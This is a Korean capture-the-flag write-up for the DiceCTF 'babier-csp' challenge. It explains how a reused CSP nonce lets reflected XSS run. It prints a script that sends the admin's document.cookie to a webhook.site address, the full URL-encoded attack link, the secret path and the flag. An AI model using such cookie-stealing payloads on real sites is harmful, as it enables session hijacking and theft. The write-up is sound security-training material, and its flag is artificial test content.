문제 유형
•
CSP, XSS, Node.js 문제
문제 정보 확인
admin의 쿠키 값의 secret 값을 index.js 파일의 config.secret 값과 동일하게 설정하였다고 한다.
admin의 쿠키 값은 Admin Bot에서 확인이 가능할 듯 하다.
index.js 파일의 내용은 아래와 같다.
const express = require('express');
const crypto = require("crypto");
const config = require("./config.js");
const app = express()
const port = process.env.port || 3000;
const SECRET = config.secret;
const NONCE = crypto.randomBytes(16).toString('base64');
const template = name => `
<html>
${name === '' ? '': `<h1>${name}</h1>`}
<a href='#' id=elem>View Fruit</a>
<script nonce=${NONCE}>
elem.onclick = () => {
location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>
</html>
`;
app.get('/', (req, res) => {
res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
res.send(template(req.query.name || ""));
})
app.use('/' + SECRET, express.static(__dirname + "/secret"));
app.listen(port, () => {
console.log(`Example app listening at http://localhost:${port}`)
})
JavaScript
복사
index.js 에서 얻을 수 있는 정보
•
const SECRET = config.secret;
•
app.use('/' + SECRET, express.static(__dirname + "/secret"));
이전 문제 설명에서 확인한 config.secret 값이 SECRET 변수에 저장되어 특정 페이지 이름으로 사용되는 것을 확인할 수 있다.
즉 관리자의 쿠키 값을 얻어 비밀 페이지로 이동해야 단서를 얻을 수 있다.
•
const NONCE = crypto.randomBytes(16).toString('base64');
•
res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
랜덤한 값을 NONCE 변수 값에 저장하여 CSP의 nonce 옵션을 사용한다.
1. XSS 동작
...
<script nonce=${NONCE}>
elem.onclick = () => {
location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>
...
JavaScript
복사
name 파라미터 값이 그대로 화면에 출력하는 것을 확인하였고, 이를 이용해 XSS가 가능한지 확인해 보았다.
하지만 index.js에 작성된대로 CSP 정책이 설정되어 있기 때문에 nonce 값을 설정해야 스크립트를 사용할 수 있다.
F12를 이용하여 현재 설정되어 있는 nonce 값을 확인할 수 있다.
XSS 구문을 CSP 정책에 맞게 다시 작성한 후 XSS가 정상적으로 동작한 것을 확인할 수 있다.
<script>alert(1)</script> → <script nonce=g+ojjmb9xLfE+3j9PsP/Ig==>alert(1)</script>
XSS 구문을 한번 인코딩 한 후 name 파라미터 값으로 넣어주어야 한다.
2. 관리자의 쿠키 값 획득
특정 파라미터 값에 document.cookie값을 설정하여 쿠키 값을 얻어올 것이다. 그러기 위해선 개인적으로 서버를 만들어도 좋지만, 귀찮다면 webhook이라는 사이트를 이용해도 좋다.
//FLAG 파라미터 값에 쿠키 값 설정
<script nonce=g+ojjmb9xLfE+3j9PsP/Ig==>document.location="https://webhook.site/b4f4608e-aa5d-4837-a8e5-88dfb037c8eb/?FLAG="+document.cookie;</script>
JavaScript
복사
PAYLOAD를 작성하였고 문제를 잘 확인해보면, 우리는 admin의 쿠키 값을 얻어야 한다.
Admin Bot 페이지에 접속하면 URL을 입력할 수 있는 부분과 Submit 이라는 버튼이 존재한다.
특정 URL을 입력하면 Admin Bot이 해당 주소로 접근하는 방식으로 추정된다.
// https://babier-csp.dicec.tf/?name= + PAYLOAD URL ENCODING 형태
https://babier-csp.dicec.tf/?name=%3Cscript%20nonce%3Dg%2Bojjmb9xLfE%2B3j9PsP%2FIg%3D%3D%3Edocument.location%3D%22https%3A%2F%2Fwebhook.site%2Fb4f4608e-aa5d-4837-a8e5-88dfb037c8eb%2F%3FFLAG%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Plain Text
복사
정상적으로 PAYLOAD가 동작하면 webhook 페이지에서 Admin Bot의 요청을 확인할 수 있으며, secret 값도 확인할 수 있다.
secret 값을 이용하여 아래 주소로 이동하면 비밀 페이지에 접속 할 수 있고, 소스코드를 확인하면 FLAG를 확인할 수 있다.
https://babier-csp.dicec.tf/4b36b1b8e47f761263796b1defd80745
Plain Text
복사
FLAG dice{web_1s_a_stat3_0f_grac3_857720}